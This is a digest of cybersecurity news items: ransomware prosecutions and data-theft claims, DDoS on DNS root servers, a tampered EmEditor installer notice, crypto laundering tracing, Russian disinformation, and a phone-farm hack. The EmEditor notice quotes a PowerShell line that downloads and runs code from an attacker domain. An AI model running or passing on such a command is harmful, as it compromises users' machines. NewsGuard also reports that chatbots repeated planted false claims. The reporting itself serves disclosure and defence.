bleepingcomputer.com
By Sergiu Gatlan
December 30, 2025
Two former employees of cybersecurity incident response companies Sygnia and DigitalMint have pleaded guilty to targeting U.S. companies in BlackCat (ALPHV) ransomware attacks in 2023.
Two former employees of cybersecurity incident response companies Sygnia and DigitalMint have pleaded guilty to targeting U.S. companies in BlackCat (ALPHV) ransomware attacks in 2023.
33-year-old Ryan Clifford Goldberg of Watkinsville, Georgia (in federal custody since September 2023), and 28-year-old Kevin Tyler Martin of Roanoke, Texas, who were charged in November, have now pleaded guilty to conspiracy to obstruct commerce by extortion and are set to be sentenced on March 12, 2026, facing up to 20 years in prison each.
Together with a third accomplice, the two BlackCat ransomware affiliates breached the networks of multiple victims across the United States between May 2023 and November 2023, paying a 20% share of ransoms in exchange for access to BlackCat's ransomware and extortion platform.
Goldberg is a former Sygnia incident response manager, and Martin worked at DigitalMint as a ransomware threat negotiator (just as the unnamed co-conspirator).
"These defendants used their sophisticated cybersecurity training and experience to commit ransomware attacks — the very type of crime that they should have been working to stop," said Assistant Attorney General A. Tysen Duva. "Extortion via the internet victimizes innocent citizens every bit as much as taking money directly out of their pockets."
According to court documents, their alleged victims include a Maryland pharmaceutical company, a California engineering firm, a Tampa medical device manufacturer, a Virginia drone manufacturer, and a California doctor's office.
While they have demanded ransoms ranging from $300,000 to $10 million, prosecutors said they were only paid $1.27 million by the Tampa medical device company after encrypting its servers and demanding $10 million in May 2023. While other victims also received ransom demands, the indictment does not indicate whether additional payments were made.
As BleepingComputer previously reported, the Justice Department was also investigating a former DigitalMint negotiator in July for allegedly working with ransomware groups. However, the DOJ and FBI did not comment on the investigation, and it is unclear if this case is related to it.
In December 2023, the FBI created a decryption tool after breaching BlackCat's servers to monitor their activities and obtain decryption keys. The FBI also found that the BlackCat operation collected at least $300 million in ransom payments from more than 1,000 victims until September 2023.
In a February 2024 joint advisory, the FBI, CISA, and the Department of Health and Human Services (HHS) also warned that Blackcat affiliates were primarily targeting organizations in the U.S. healthcare sector.
Hackread – Cybersecurity News, Data Breaches, AI, and More
by
Waqas
December 26, 2025
2 minute read
On December 25, while much of the world was observing Christmas, the Everest ransomware group published a new post on its dark web leak site claiming it had breached Chrysler systems, an American automaker. The group says it exfiltrated 1088 GB (over 1 TB) of data, describing it as a full database linked to Chrysler operations.
According to the threat actors, the stolen data spans from 2021 through 2025 and includes more than 105 GB of Salesforce related information. Everest claims the data contains extensive personal and operational records tied to customers, dealers, and internal agents.
Everest Ransomware Group Claims Theft of Over 1TB of Chrysler Data
Screenshot from the Everest ransomware group’s dark web leak site (Credit: Hackread.com)
Leaked Screenshots and Sample Data Details
Screenshots shared by the group and reviewed for this report appear to show structured databases, internal spreadsheets, directory trees, and CRM exports. Several images display Salesforce records containing customer interaction logs with names, phone numbers, email addresses, physical addresses, vehicle details, recall case notes, and call outcomes such as voicemail, disconnected, wrong number, or callback scheduled.
Everest Ransomware Group Claims Theft of Over 1TB of Chrysler Data
Related screenshots (Credit: Hackread.com)
The same material also includes agent work logs documenting call attempts, recall coordination steps, appointment handling, and vehicle status updates, such as sold, repaired, or owner not found.
Additional screenshots appear to reference internal file servers and directories labelled with dealer networks, automotive brands, recall programs, FTP paths, and internal tooling. One set of images also suggests the presence of HR or identity-related records, listing employee names, employment status fields such as active or permanently separated, timestamps, and corporate email domains associated with Stellantis.
For your information, Stellantis is a global automaker behind brands such as Jeep, Chrysler, Dodge, and FIAT. The automaker was also a victim of a cyber attack in September 2025.
Samples published by the attackers also include recall case narratives documenting customer conversations, interpreter use, dealership coordination, appointment scheduling, and follow-up actions. These records align with standard automotive recall support and customer service processes and are consistent with the CRM data shown in other samples.
The group has threatened to publish the full dataset once its countdown timer expires, stating that the company still has time to make contact. Everest also announced plans to release audio recordings linked to customer service interactions, further escalating the pressure.
Unconfirmed Pending Chrysler Response
Ransomware groups increasingly time disclosures around holidays, when incident response capacity is often reduced. At the time of writing, Chrysler has not publicly confirmed the breach or commented on the claims, and independent verification remains limited.
If validated, the alleged exposure would raise significant concerns regarding customer privacy, internal operational security, and third-party platform governance, given the reported scale and sensitivity of the CRM and recall management data involved.
This story is developing.
| NETSCOUT netscout.com
by
John Kristoff, Max Resing
on
December 17th, 2025
Executive SummaryThe internet is a system of systems. There is no central organizing committee that governs how it is constructed and operated.
Executive Summary
The internet is a system of systems. There is no central organizing committee that governs how it is constructed and operated. There are norms and best practices, as well as agreed-upon standards of operation such as what an Internet Protocol (IP) datagram looks like and how it should be interpreted, but even the behaviors of creating and interpreting IP packets can sometimes vary. For these reasons, to identify the core of the internet, and enforce lasting and comprehensive control over it, is not easy. However, there are a handful of internet subsystems people often name as being critical to the proper and safe functioning of the internet. One such subsystem is the Domain Name System (DNS) root servers. Internet disruptions can take many forms, but if the root DNS system were to become unavailable, it would be practically indiscernible from a complete and total internet outage. In practice, the system’s resiliency and caching behavior of resolvers significantly blunts the likelihood of a complete system failure. Nevertheless, the performance and accuracy of this subsystem is of utmost importance.
The root DNS system has come under attack many times throughout history, and in some cases, we have seen some partial disruption. Overall, however, the DNS root server system has remained robust and widely available. Replication and redundancy of root system component parts, along with high levels of operational care, have largely led to the success of the root server system. However, the root system is always under pressure from high-rate packet floods, route hijacking, and physical sabotage. This blog examines some of these pressures from the perspective of distributed denial-of-service (DDoS) attack traffic to which the root server system is subject.
Key Findings
Background
Most internet client communications start with a DNS query. An application maps an abstract but human-readable name into something about that name such as an IP address. This process is colloquially called the DNS resolution process, and the DNS root servers literally and figuratively stand at the apex of this hierarchical system. They are the entry point into a distributed database that makes mapping names to IP addresses possible. Technically, the internet could operate without DNS, but in practice it has become an important part of the communications process. It is safe to say that the DNS is one of the most important—if not the most important—subsystem of them all. The performance and availability of this system therefore is paramount.
DNS servers come under attack all the time, some more than others. An attack involving the DNS is typically one of two types. The first major type’s purpose is to compromise the integrity of DNS data. This might be performed by altering the source of DNS data itself—by compromising a server and changing zone files, for example. Alternatively, an attacker may try to manipulate a resolution in flight. DNS cache poison attacks are a common vector of attack against the resolution process, for instance.
The second type of attack attempts to disrupt the DNS resolution process by taking an authoritative DNS server in the name space hierarchy out of service. This is a classic denial-of-service attack. The nearer the apex of the name space or for highly impactful zones, a disruption can have far-reaching effects. If the root servers were to be disrupted, for example, this would ultimately cause problems for practically everyone and everything that uses the DNS.
Fortunately, the DNS root server system has rarely been the target of successful integrity or disruption attacks. That is not to say the DNS root system has not been attacked; this Wikipedia page lists a few high-profile attacks DNS root servers have been subject to.
The root server system is extremely well provisioned and operated. There are 12 root server operators and hundreds of root servers located all over the world. Primarily through the use of BGP anycast, the modern root server system is extraordinarily resilient to denial-of-service packet flooding attacks. However, attack attempts still seem to appear from time to time. In the remainder of this article, we examine some of the attacks the root system is subject to, and with the help of third-party data show how well the system has withstood these onslaughts.
Motivations for DDoS Attacks on DNS Root Servers
The root servers have been subject to a variety of threats, with some degree of success. Due to the extensive redundancy and capacity of the current system, however, disrupting the system with packet flooding?–style attacks is not easy. Furthermore, most modern attacks aim to disrupt a specific subset of service on the internet, not the entire internet itself. Although some attackers may seek to cause general mischief or to exert a show of strength, a degraded root server system would just make everything worse for everyone. This is rarely the objective of today’s internet miscreants. In addition, internet defenders everywhere leap into action the larger and more widespread attacks become. An attack against the root system is not just an attack against the 12 root operators and their systems, but against the entire internet, much of which will respond to thwart attempts to disrupt the system.
So, although attacks on the DNS root occur, most of them are rarely noticed by the public or do not have a significant impact. Nonetheless, we do observe elevated rates of traffic toward the root—traffic that might even overwhelm many other organizations and networks. Attacks against the root may be trying to learn incident response time and defenses. They might also be observing the effect attacks have on public monitoring graphs of performance or response latency—if not for the root specifically, perhaps even local and in-transit networks. The root system, being so central to the internet, is exposed to a lot of suspicious and malicious traffic. Much of this otherwise-unwanted traffic may be simply noise, but whatever the reasons, it is often helpful to study what the root sees, because it just may be a harbinger of what any target on the internet might be up against. What can we learn from analyzing attacks on the root? We explore this question in the next section.
Analysis
NETSCOUT’s ATLAS visibility platform provides a tremendous amount of telemetry for DDoS attack events. Figure 1 presents a chronological overview of DDoS events aimed at the root servers. The strongest volumetric attack present in the ATLAS dataset shows an attack on the A root server with 21Gb/s of traffic on August 17, 2025.
Figure 1: Chronological overview of DDoS attack events on DNS root servers as visible in ATLAS threat intelligence datasets. Illustrated are a total of 38 data points. (The dataset observes no attacks on g.root-servers.net.)
Figure 1: Chronological overview of DDoS attack events on DNS root servers as visible in ATLAS threat intelligence datasets. Illustrated are a total of 38 data points. (The dataset observes no attacks on g.root-servers.net.)
ASERT observes a different set of DDoS attack vectors to different root servers. The A root and the M root face numerous DDoS attack vectors. In contrast, D and H–L root servers are only observed to have seen the combinations of total traffic and Internet Control Message Protocol (ICMP) attacks. Often, the ICMP observations are sympathetic to a DDoS attack, meaning that attackers and/or defenders probe systems to gain insights. In theory, each instance (A through M) of the root should be a mirror of the others.
Why might some root server instances be subject to vastly different amounts of traffic? A variety of reasons could explain this discrepancy. For example, some instances may be preferred by resolvers due to historical accident, topological connectivity, or resolver selection strategy. An interesting speculation of why the A root receives more attacks is because it is the first letter of the alphabet—a dull but probable reason. Root operators deploy different numbers of anycast instances, and those instances are distributed unevenly around the world. Because BGP anycast directs queries to the topologically closest anycast instance, some root instances may naturally attract more traffic, including more noise and invalid queries (see Figure 2).
Figure 2: This percentage overview presents the DDoS attack events observed and reveals how some root servers receive a wider array of DDoS attack vectors.
Figure 2: This percentage overview presents the DDoS attack events observed and reveals how some root servers receive a wider array of DDoS attack vectors.
Discussion
The numerous instances of root servers make it particularly cumbersome to construct a full picture of traffic that reaches the root servers. Although anycast impacts the visibility of external institutions into operational aspects of root server instances, it enhances the resiliency of a DNS root server formidably—a much-desired characteristic for such a critical building block of the internet. The distribution of traffic to different instances provides the advantage of spreading queries out but also isolating sources of DDoS attack traffic to local instances.
Studies over the years have measured significant amounts of query traffic to root servers that are illegitimate. [Wessel, ISOC]. Despite the massive overrepresentation of noise to useful query traffic, the steady state of DNS root traffic volumes remains relatively modest compared with other types of services, usually measured in the tens of megabits per second. This is due to the nature of DNS query traffic itself: small, short-lived request/response packets. Long-lived, large data flows don’t occur in the DNS. Furthermore, although the use of DNS over Transmission Control Protocol (TCP) is slightly increasing, TCP-based attacks are still relatively rare and infrequent in the DNS.
What lessons can we learn from the resiliency of the DNS root server system? Simplicity, instance placement distribution, operational diversity, the use of anycast, and of course expert technical operators overseeing it all. These attributes may not be easily replicated in other parts of the internet, but perhaps we can leverage some of what works where it can work in other systems?
Recommendations
Defenders can take lessons from DNS root server operations. In some cases, their techniques are engineering choices, not commercial purchasing decisions. For example, can anycast be used to help make the attack surface wider and less reliant on single points of failure? To detect and mitigate abusive, ever-changing networks of varying size and duration, we recommend the following:
Real-time visibility into volumetric traffic floods and distributed attack patterns. Tools such as NETSCOUT Arbor Sightline can help surface early signs of trouble and trigger flow-specification and remotely triggered black hole (RTBH) defenses to upstream providers.
Proactive mitigation with automated systems such as Arbor Threat Mitigation System (TMS) or Arbor Edge Defense (AED). These can stop both volumetric floods and more-complex, multivector attacks.
Intelligence-driven defense with feeds such as NETSCOUT’s ATLAS Intelligence Feed (AIF). These provide information about context, what’s trending, who’s being targeted, and how actors are evolving.
Staying ahead of threat actors is an ever-changing job and requires a broad view of where these attacks come from, how they operate, and where they could strike next.
EmEditor (Text Editor) emeditor.com
December 22, 2025/in General/by Yutaka Emura
We regret to inform you that we have identified an incident involving the EmEditor official website’s download path (the [Download Now] button), where unauthorized modification by a third party is suspected. During the affected period, the installer downloaded via that button may not have been the legitimate file provided by us (Emurasoft, Inc.).
We sincerely apologize for the concern and inconvenience this may cause. Please review the information below.
Potentially Affected Period
Dec 19, 2025 18:39 – Dec 22, 2025 12:50 (U.S. Pacific Time)
If you downloaded the installer from the [Download Now] button on the EmEditor homepage during this period, it is possible that a different file without our digital signature was downloaded. This is a conservative estimate, and in reality the affected period may have been narrower and limited to a specific timeframe.
Incident Summary (High-Level Cause)
The [Download Now] button normally points to the following URL:
https://support.emeditor.com/en/downloads/latest/installer/64
This URL uses a redirect. However, during the affected period, the redirect settings appear to have been altered by a third party, resulting in downloads being served from the following (incorrect) URL:
https://www.emeditor.com/wp-content/uploads/filebase/emeditor-core/emed64_25.4.3.msi
This file was not created by Emurasoft, Inc., and it has already been removed.
As a result, we have confirmed that the downloaded file may be digitally signed not by us, but by another organization named WALSHAM INVESTMENTS LIMITED.
Note: This issue may not be limited to the English page and may affect similar URLs for other languages as well (including Japanese).
emed64_25.4.3.msi
Legitimate file (official)
File name: emed64_25.4.3.msi
Size: 80,376,832 bytes
Digital signature: Emurasoft, Inc.
SHA-256: e5f9c1e9b586b59712cefa834b67f829ccbed183c6855040e6d42f0c0c3fcb3e
Suspicious file (possible tampering)
File name: emed64_25.4.3.msi
Size: 80,380,416 bytes
Digital signature: WALSHAM INVESTMENTS LIMITED
You updated via EmEditor’s Update Checker or through EmEditor’s automatic update
You downloaded directly from download.emeditor.info
Example: https://download.emeditor.info/emed64_25.4.3.msi
You downloaded a file other than emed64_25.4.3.msi
You used the portable version
You used the store app version
You installed/updated using winget
You downloaded the file but did not run/execute it
5-1. How to check the Digital Signature (Windows)
Right-click the file (emed64_25.4.3.msi) and select Properties.
Open the Digital Signatures tab.
Confirm that the signer is Emurasoft, Inc.
If it shows WALSHAM INVESTMENTS LIMITED, the file may be malicious.
If the “Digital Signatures” tab is not shown, the file may be unsigned or the signature may not be recognized. In that case, do not run the file; delete it and follow the guidance below.
5-2. How to check SHA-256 (Windows / PowerShell)
Open PowerShell and run:
Get-FileHash .\emed64_25.4.3.msi -Algorithm SHA256
Confirm the output SHA-256 matches:
Legitimate SHA-256:
e5f9c1e9b586b59712cefa834b67f829ccbed183c6855040e6d42f0c0c3fcb3e
If the signature or SHA-256 does not match (Recommended actions)
If the digital signature is not Emurasoft, Inc. (e.g., it is WALSHAM INVESTMENTS LIMITED) or the SHA-256 does not match, you may have obtained a tampered file (potentially containing malware).
Immediately disconnect the affected computer from the network (wired/wireless)
Run a full malware scan on the system
Depending on the situation, consider refreshing/rebuilding the environment including the OS
Consider the possibility of credential exposure and change passwords used/stored on that device (and enable MFA where possible)
If you are using EmEditor in an organization, we also recommend contacting your internal security team (e.g., CSIRT) and preserving relevant logs where possible.
powershell.exe "irm emeditorjp.com | iex"
This command downloads and executes content from emeditorjp.com.
emeditorjp.com is not a domain managed by Emurasoft, Inc.
Please also note that the installer may still proceed to install EmEditor normally and install legitimate EmEditor program files, which could make the issue difficult to notice.
We sincerely apologize again for the inconvenience and concern this may have caused, and we appreciate your understanding and continued support of EmEditor.
trmlabs.com Team | TRM Blog
TRM traced LastPass-linked Bitcoin laundering through mixers to high-risk Russian exchanges, showing how demixing exposes infrastructure reuse and limits mixer anonymity.
Key takeaways
In 2022, hackers breached LastPass, one of the world’s most widely used password managers, exposing backups of roughly 30 million customer vaults — encrypted containers holding users’ most sensitive digital credentials, including crypto private keys and seed phrases. * Although the vaults were encrypted and initially unreadable without each user’s master passwords, attackers were able to download them in bulk. That created a long-tail risk for more than 25 million users globally: any vault protected by a weak master password could eventually be decrypted offline, turning a single 2022 intrusion into a multi-year window for attackers to quietly crack passwords and drain assets over time.
New waves of wallet drains have surfaced throughout 2024 and 2025, extending the breach’s impact far beyond its initial disclosure. By analyzing a recent cluster of these drains, TRM analysts were able to trace the stolen funds through mixers and ultimately to two high-risk Russian exchanges frequently used by cybercriminals as fiat off-ramps — with one of them receiving LastPass-linked funds as recently as October.
These findings offer a clear on-chain view of how the stolen assets are being moved and monetized, helping illuminate the pathways and infrastructure supporting one of the most consequential credential breaches of the last decade. Based on the totality of on-chain evidence — including repeated interaction with Russia-associated infrastructure, continuity of control across pre-and post-mix activity, and the consistent use of high-risk Russian exchanges as off-ramps — TRM assesses that the activity is consistent with involvement by Russian cybercriminal actors.
Analysis of these thefts reveals two consistent indicators that point toward possible Russian cybercrime involvement.
First, stolen funds were repeatedly laundered through infrastructure commonly associated with Russian cybercriminal ecosystems, including off-ramps historically used by Russia-based threat actors.
Second, intelligence linked to the wallets interacting with mixers both before and after the mixing and laundering process indicated operational ties to Russia, suggesting continuity of control rather than downstream reuse by unrelated actors.
While definitive attribution of the original intrusion cannot yet be confirmed, these signals, combined with TRM’s ability to demix activity at scale, highlight both the central role of Russian cybercrime infrastructure in monetizing large-scale hacks and the diminishing effectiveness of mixing as a reliable means of obfuscation.
What demixing revealed
TRM identified a consistent on-chain signature across the thefts: stolen Bitcoin keys were imported into the same wallet software, producing shared transaction traits such as SegWit usage and Replace-by-Fee. Non-Bitcoin assets were quickly converted into Bitcoin via instant swap services, after which funds were transferred into single-use addresses and deposited into Wasabi Wallet. Using this pattern, TRM estimates that more than USD 28 million in cryptocurrency was stolen, converted to Bitcoin, and laundered through Wasabi in late 2024 and early 2025.
Rather than attempting to demix individual thefts in isolation, TRM analysts analyzed the activity as a coordinated campaign, identifying clusters of Wasabi deposits and withdrawals over time. Using proprietary demixing techniques, analysts matched the hackers’ deposits to a specific withdrawal cluster whose aggregate value and timing closely aligned with the inflows, an alignment statistically unlikely to be coincidental.
Blockchain fingerprints observed prior to mixing, combined with intelligence associated with wallets after the mixing process, consistently pointed to Russia-based operational control. The continuity across pre-mix and post-mix stages strengthens confidence that the laundering activity was conducted by actors operating within, or closely tied to, the Russian cybercrime ecosystem.
Early Wasabi withdrawals occurred within days of the initial wallet drains, suggesting that the attackers themselves were responsible for the initial CoinJoin activity. Taken together, these findings demonstrate both the diminishing reliability of mixing as an obfuscation technique and the central role of demixing in revealing the structure and geography of large-scale illicit campaigns.
Russian off-ramps as a reinforcing signal
Analysis of LastPass-linked laundering activity reveals two distinct phases that both converged on Russian exchanges. In an earlier phase following the initial exploitation, stolen funds were routed through the now defunct Cryptomixer.io and off-ramped via Cryptex, a Russia-based exchange sanctioned by OFAC in 2024. In a subsequent wave identified in September 2025, TRM analysts traced approximately USD 7 million in additional stolen funds through Wasabi Wallet, with withdrawals ultimately flowing to Audi6, another Russian exchange associated with cybercriminal activity.
Applying the same demixing methodology across both periods, TRM identified consistent laundering patterns, including clustered withdrawals and peeling chains that funneled mixed Bitcoin into these exchanges. The repeated use of Russian exchanges at the off-ramp stage, combined with intelligence indicating Russia-based operational control both before and after mixing, suggests continuity in the laundering infrastructure rather than isolated or opportunistic usage. Together, these findings point to alignment with a persistent Russian cybercriminal ecosystem across multiple phases of the LastPass-related activity.
Why the Russian connection matters
The significance of likely Russian involvement extends beyond this single case. Russian high-risk exchanges and laundering services have repeatedly served as critical off-ramps for globally dispersed ransomware groups, sanctions evaders, and other cybercriminal networks. Their role in the LastPass laundering pipeline underscores how Russia-based financial infrastructure continues to function as a systemic enabler of global cybercrime, even as enforcement pressure increases elsewhere.
This case also highlights how mixers do not eliminate attribution risk when threat actors rely on consistent infrastructure and geographic ecosystems over time. Demixing allowed TRM to move beyond individual transactions and reveal the broader operational architecture, including where illicit value ultimately converges.
Frequently asked questions (FAQs)
What happened in the LastPass breach?
In 2022, a threat actor gained access to encrypted vault data stored by LastPass. As users failed to rotate passwords or improve vault security, attackers continued to crack weak master passwords years later — leading to wallet drains as recently as late 2025.
Why is Russian involvement suspected?
TRM observed two consistent signals:
Pre and post-mix wallet intelligence pointed to the same operator using Russian infrastructure.
Off-ramps included multiple Russia-based exchanges, including one previously sanctioned for facilitating ransomware laundering.
Behavioral patterns (e.g. wallet software traits, transaction formatting)
Timing and amounts
Destination addresses with known ties to illicit ecosystems
This enabled linkage across waves of theft and over time — exposing centralized laundering control.
USD 28 million demixed from 2024–early 2025 flows
USD 7 million from a September 2025 wave linked to additional Wasabi usage
Why is this still happening three years later?
Many affected LastPass users failed to change or secure master passwords, and their vaults still contained private keys. As threat actors brute-force vaults over time, slow-drip wallet draining has become a recurring pattern.
What makes this case important?
This is a clear example of how:
Mixers don't provide true anonymity when infrastructure is reused
Off-ramp infrastructure remains the best attribution signal
Illicit networks adapt, but don’t disappear — when one service is sanctioned, another emerges
newsguardrealitycheck.com
By Eva Maitland and Alice Lee
400 and Counting: A Russian Influence Operation Overtakes Official State Media in Spreading Russia-Ukraine False Claims
As Ukraine faces battlefield struggles, an ongoing corruption probe, and pressure from the U.S., the Storm-1516 Russian disinformation operation is becoming more prolific and harmful, an analysis of NewsGuard’s database of more than 400 false claims about the war shows.
newsguardrealitycheck.com
By Eva Maitland and Alice Lee
NewsGuard has now debunked 400 false claims about the Russia-Ukraine war pushed by Russia, and an analysis of our database shows that in 2025, Russian influence operations surpassed official state media as the biggest source of these narratives.
One operation in particular, dubbed by Microsoft as Storm-1516, has emerged as the most prolific and rapidly expanding of the various operations, NewsGuard found. The campaign is known for generating and spreading false claims accusing Ukraine and its allies of corruption and other illegal acts, employing AI-enabled websites, deepfake videos, and inauthentic X accounts. False claims by the campaign often reach millions of views on social media.
RT and Sputnik, the Kremlin’s primary state-funded outlets aimed at a global audience, have long been at the heart of Russia’s propaganda efforts. However, NewsGuard found that in 2025, RT and Sputnik together spread just 15 false claims about the war — compared to 24 created and spread by Storm-1516 alone. NewsGuard sent emails to RT and Sputnik seeking comment on state media’s influence compared to Storm-1516 but did not receive a response.
Russia’s other major foreign influence operations include Matryoshka, a campaign known for mass-creating fake news reports appropriating the branding of credible news outlets, and the Foundation to Battle Injustice, a self-styled human rights organization that publishes “investigations” accusing Ukraine and its allies of human rights abuses. False claims by these campaigns are typically amplified by the Kremlin’s vast disinformation ecosystem, which includes the Pravda network, which encompasses 280 sites identified by NewsGuard that republish Russian propaganda in large volume in dozens of languages.
Nearly four years into the war in Ukraine, NewsGuard has debunked 44 false claims about the war emanating from Storm-1516, compared to 25 false claims from Matryoshka and six by the Foundation to Battle Injustice. These figures are derived from NewsGuard’s proprietary database of False Claims Fingerprints, a continuously updated datastream of provably false claims and their debunks.
Moreover, Storm-1516 has been steadily increasing its output since its inception in 2023. NewsGuard found that six of its false claims emerged from August 2023 to January 2024, 14 from February 2024 to January 2025, and 24 from February 2025 to mid-December 2025, making the campaign the fastest-growing source of false claims about the war monitored by NewsGuard.
Storm-1516 overtook the combination of RT and Sputnik in 2025 as purveyors of false information, according to NewsGuard’s database.
The rise of Storm-1516 as a source of false information about the war suggests that the Kremlin is increasingly relying on covert influence operations — rather than its state-owned media, which are sanctioned and banned in Europe and the U.S. — to spread false claims. Operations like Storm-1516, which are not officially state-owned media, are not typically subject to sanctions, although companies and individuals associated with them sometimes are. (More on this below.)
Moscow is set to spend $1.77 billion on state media in 2026, with $388 million reserved for RT, marking “a new all-time high,” the independent news agency the Moscow Times reported. Sputnik’s budget is unclear, and the amount spent by the Kremlin on its covert operations is also unknown.
FAKES PUSHING FAKES, THANKS TO AI
Thanks to AI tools, the influence campaigns outside of state media appear to be able to produce and propagate false claims at far greater speed and volume, and reach more viewers. Storm-1516 published five false claims about Ukraine in November 2025 alone, which spread in 11,900 articles and posts on X and Telegram, generating 43 million views.
AI appears to be a key factor enabling Storm-1516 to increase its productivity and effectiveness. When the campaign began in late 2023, it initially posted videos to YouTube of real people posing as whistleblowers denouncing corruption by Zelensky. By early 2024, it had begun using AI-generated personas in its “whistleblower” videos and planting its false claims on a network of hundreds of AI-enabled news sites. With names like BostonTimes.org, SanFranChron.com, and LondonCrier.com, the sites came complete with AI-generated logos and used AI to rewrite and automatically publish content from other news outlets.
THE HAND OF DOUGAN
Storm-1516 includes the efforts of John Mark Dougan, the former U.S. Marine and Florida deputy sheriff who fled to Russia in 2016 after his home was raided by the FBI for allegedly leaking confidential information about local officials. In 2018, Palm Beach County prosecutors charged Dougan with wiretapping and extortion, officially making him a fugitive on the run.
In conversations with NewsGuard, Dougan has consistently denied having any links to the Russian government. For example, when NewsGuard asked Dougan in October about his involvement with 139 French-language websites making false claims about President Macron, Dougan told us on Signal, “I’ve never heard of those sites. Still, I have no doubt [about] the accuracy and quality of the news they report.”
In October 2024, The Washington Post reported that Dougan was provided funding by the GRU, Russia’s military intelligence service, and directed by Valery Korovin, director of the Russian think tank Center for Geopolitical Expertise. The Post reported that the GRU paid Dougan to create and manage an AI server in Russia.
In December 2025, the European Union added Dougan to a new sanctions list, making him the first American to be sanctioned for allegedly running influence operations with the goal of “influenc[ing] elections, discredit[ing] political figures and manipulat[ing] public discourse in Western countries.” Eleven other individuals were also sanctioned for online influence operations. Asked over messaging app Signal about his role in Storm-1516 and how the campaign was able to increase its output in 2025, Dougan said in a Dec. 23, 2025, message, “Storm 1516? Never heard of them. Sorry.”
CAPITALIZING ON CORRUPTION
False claims generated or pushed by Storm-1516 often accuse Ukrainian President Volodymyr Zelensky and other Ukrainian officials of using Western aid money to make lavish purchases of properties, cars, and other luxury items. More than the other Russian operations, NewsGuard found that Storm-1516 has ramped up its operations in recent months, apparently seeking to capitalize on negative press linked to an ongoing corruption scandal in Ukraine and growing pressure from the Trump administration for Ukraine to make concessions to Russia.
When Ukraine’s National Anti-Corruption Bureau (NABU) announced in mid-November that it was investigating a $100 million embezzlement scheme in Ukraine’s energy sector, Storm-1516 jumped at the opportunity to spread false claims implicating Zelensky in the scandal. (Zelensky has not been indicted or directly implicated in accusations of corruption.)
For example, on Dec. 10, 2025, X accounts associated with Storm-1516 published a video modelled on the style of videos from NABU and the Specialized Anti-Corruption Prosecutor’s Office (SAP) — even displaying the agencies’ logos at the start of the video — claiming that anti-corruption investigators found $14 million in cash, records of $2.6 billion in offshore bank transfers, and a number of foreign passports for Zelensky during a search of the office of Andriy Yermak, Ukrainian President Volodymyr Zelensky’s former chief of staff.
A December 2025 Storm-1516 campaign made false claims, capitalizing on an ongoing corruption probe. (Screenshots via NewsGuard)
“NABU discovered a collection of foreign passports during a court authorized search of presidential chief of staff Andriy Yermak’s office in Kyiv,” the video stated, displaying images of apparent Israeli and Bahamian passports featuring Zelensky’s face and information.
The NABU/SAP video is a fabrication, and does not appear on any of NABU’s or SAP’s official social media channels or websites. There is no evidence that Zelensky or Yermak have passports of other countries.
Nevertheless, the claim spread in 4,300 posts on X and Telegram, gaining more than 4 million views. For example, a Dec. 11, 2025, X post of the video by @aleksbrz11, a pro-Kremlin account with a profile picture showing a fighter for the former Russian mercenary Wagner group, gained 1.8 million views and 1,800 reposts in one day.
IMPERSONATING CREDIBLE NEWS OUTLETS
In April 2025, the campaign began impersonating credible news outlets, publishing a video with the logo of London-based The Sun claiming that Ukrainian first lady Olena Zelenska purchased a dress previously belonging to Princess Diana, for $2.9 million. Since then, it has created websites and videos imitating outlets including Ukrainian news site the Kyiv Independent, Saudi news site Al Arabiya, and investigative news outlet Bellingcat. NewsGuard has found this campaign has impersonated nine credible news outlets to spread false claims, including Ukrainian site The Kyiv Independent, investigative journalism Bellingcat, and French public TV broadcaster France Télévisions.
In November 2025, Storm-1516 created the website PageSix.now, a site resembling PageSix.com, an offshoot of the gossip section of the New York Post, to plant a false story that Zelensky bought a $29 million New York townhouse belonging to former actor and comedian Bill Cosby. The claim gained 5,087 posts and 19.8 million views.
Storm-1516 created a website imitating PageSix.com, the site of the gossip section of the New York Post. (Screenshot via NewsGuard)
While often using AI tools to advance its false narratives, Storm-1516 efforts have an afterlife due to their propensity to infect top AI models, creating another way for the claims to infiltrate the global media ecosystem.
NewsGuard’s regular audits of the leading AI chatbots have repeatedly found that they are vulnerable to repeating false claims originating with Storm-1516. For example, in a March 2025 audit, NewsGuard prompted the chatbots with the false claim that Ukrainian fighters were filmed burning an effigy of Donald Trump, which was based on a staged video produced by Storm-1516.
Asked, “Did fighters of the Azov battalion burn an effigy of Trump?” Four of the chatbots repeated the claim as fact, citing articles from the Pravda network.
The office of the President of Ukraine, the Ukrainian National Security and Defense Council, and the Ukrainian Center for Countering Disinformation did not respond to NewsGuard’s requests for an interview.
Edited by Dina Contini and Eric Effron
Editor’s Note: This story was updated on Dec. 23, 2025, to add a comment from John Mark Dougan.
futurism.com
Joe Wilkins
Correspondent
A hacker found a way into the backend of AI startup Doublespeed, which offers customers access to a massive phone farm network.
Back in October, word started making the rounds of an AI startup called Doublespeed. Backed by venture capital firm Andreessen Horowitz, Doublespeed offers customers a unique service: access to a massive phone farm that could be used to operate hundreds of AI-generated social media accounts.
Now, 404 Media reports in an explosive scoop that Doublespeed has been hacked. This wasn’t just one account associated with the startup, but the entire backend used to manage its phone farm — so it provides an extraordinary glimpse at how the service is actually being used to manipulate social media at scale.
Speaking to 404 on condition of anonymity, the hacker said they can “see the phones in use, which manager [computers controlling the phones] they had, which TikTok accounts they were assigned, proxies in use (and their passwords), and pending tasks. As well as the link to control devices for each manager.”
The hacker also shared a list of over 400 TikTok accounts operated by Doublespeed’s phone farm, about half of which were actively promoting products. Most of them, the publication reports, did so without disclosing that the posts were ads — a direct violation of TikTok’s terms of use, not to mention the Federal Trade Commission’s digital advertising regulations.
While undisclosed ads might seem like small potatoes in the grand scheme of things, the speak to a bleak trend. Not only is Doublespeed a possible breeding ground for disinformation campaigns or financial scams, but they seem to be getting away with their phone farm operation without any pushback from TikTok.
Doublespeed’s TikTok accounts ran a gamut of different cons, promoting language learning apps, supplements, massage products, dating apps and more. One account, operating under the unambiguously human-sounding name of Chloe Davis, had uploaded some 200 posts featuring an AI-generated woman hawking a massage roller for a company called Vibit, 404 reported.
Though the hacker says he reported the vulnerability to Doublespeed on October 31, he notes that he still had access to the company’s back end as recently as today.
So far, Doublespeed is only active on TikTok, though it has plans to expand to Instagram, Reddit, and X-formerly-Twitter. When it does, it seems all bets are off — with social media engagement, and all the influence it entails, being relegated to the highest bidder.
The Chinese Ministry of State Security intelligence service disclosed in October that the U.S. National Security Agency has been engaged in a three-year cyber campaign to break into the official National Time Service Center.
The center is located in the north-central city of Xian. It provides precision time services that state media say are vital for military systems, communications, finance, electricity, transportation and mapping.
